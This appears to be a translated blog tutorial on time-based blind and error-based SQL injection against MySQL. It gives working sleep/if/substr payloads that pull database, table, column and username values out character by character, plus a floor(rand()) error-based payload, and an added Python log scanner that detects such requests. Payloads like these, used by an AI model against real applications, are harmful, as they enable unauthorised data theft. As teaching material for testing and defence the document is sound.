中国蓝

Time-based blind injection

2018-12-20  陈望_ning

sleep injection

Getting the database name

and sleep(if(ascii(substr(database(),1,1))<116,0,5)) %23
and sleep(if(ascii(substr(database(),1,1))<115,0,5)) %23
If the payload with 116 returns immediately and the one with 115 delays 5 seconds, the ASCII value is 115, which maps to 's', so the first character of the database name is 's'. Repeat the same comparison for each position to recover the full database name.

Getting the table names

and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<102,0,5)) %23
and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<101,0,5)) %23
102 returns immediately and 101 delays five seconds. The limit 0,1 can be changed to query the other tables.

Getting the column names

and sleep(if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1))<106,0,5)) %23
and sleep(if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1))<105,0,5)) %23
The delay reveals the first letter of the first column name. Change the parameter after limit and repeat to obtain the first column name and then the remaining ones.

Getting the values in the table

and sleep(if(ascii(substring((select username from security.users limit 0,1),1,1))<69,0,5)) %23
and sleep(if(ascii(substring((select username from security.users limit 0,1),1,1))<68,0,5)) %23
The ASCII value is 68; continue in the same way to recover the username.

if(payload,sleep(3),1)
When the payload condition is true, the program pauses for 3 seconds; otherwise it executes immediately.
if(payload,1,sleep(3))
When the payload condition is true, the program executes immediately; otherwise it pauses for 3 seconds.
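As an added defender-side example (not code from the original post), the following Python scans web access log lines for the sleep(if(...)) boolean oracle described above and flags requests where the delay actually occurred. The log format, the trailing response-time field and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Time-delay primitives used by this technique (benchmark() is the usual alternative).
TIME_BASED = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
COND_WRAP = re.compile(r"\bif\s*\(", re.IGNORECASE)          # sleep(if(cond,0,5)) oracle
INFO_SCHEMA = re.compile(r"information_schema\.(tables|columns)", re.IGNORECASE)

# Constructed sample log: combined-log style with response time in ms appended (assumption).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Dec/2018:10:00:01 +0800] "GET /item?id=1 HTTP/1.1" 200 982 12
10.0.0.7 - - [20/Dec/2018:10:00:03 +0800] "GET /item?id=1'+and+sleep(if(ascii(substr(database(),1,1))<116,0,5))+%23 HTTP/1.1" 200 982 15
10.0.0.7 - - [20/Dec/2018:10:00:09 +0800] "GET /item?id=1'+and+sleep(if(ascii(substr(database(),1,1))<115,0,5))+%23 HTTP/1.1" 200 982 5012
10.0.0.9 - - [20/Dec/2018:10:00:10 +0800] "GET /item?id=1'+and+sleep(if(ascii(substr((select+table_name+from+information_schema.tables+where+table_schema='security'+limit+0,1),1,1))<102,0,5))+%23 HTTP/1.1" 200 982 20
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d+ \d+ (\d+)$')

def classify(line, slow_ms=4000):
    """Return a finding dict for a suspicious request, or None if the line looks clean."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, url, resp_ms = m.group(1), m.group(2), int(m.group(3))
    # Decode the query string so %23 becomes '#' and '+' becomes a space before matching.
    query = unquote_plus(url.partition("?")[2])
    if not TIME_BASED.search(query):
        return None
    reasons = ["time-based function"]
    if COND_WRAP.search(query):
        reasons.append("conditional delay")       # boolean oracle built on sleep()
    if INFO_SCHEMA.search(query):
        reasons.append("schema enumeration")      # table/column name extraction
    if resp_ms >= slow_ms:
        reasons.append("delay observed")          # the guessed condition was true
    return {"src": src, "query": query, "resp_ms": resp_ms, "reasons": reasons}

def scan(log_text):
    """Classify every line of the log and keep only the findings."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["src"], finding["resp_ms"], ", ".join(finding["reasons"]))
```

Requests that carry a delay function but return fast are still worth alerting on: they are the "false" branches of the oracle, and a burst of them from one source is the enumeration itself.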

Original MySQL statement

update user set password = 'admin' where password = (select 1 from (select count(*),(concat("",database(),"",floor(rand()*2))) name from information_schema.tables group by name)b);

In the form

and (select 1 from (select count(*),(concat("",database(),"",floor(rand()*2))) name from information_schema.tables group by name)b) #&submit=submit
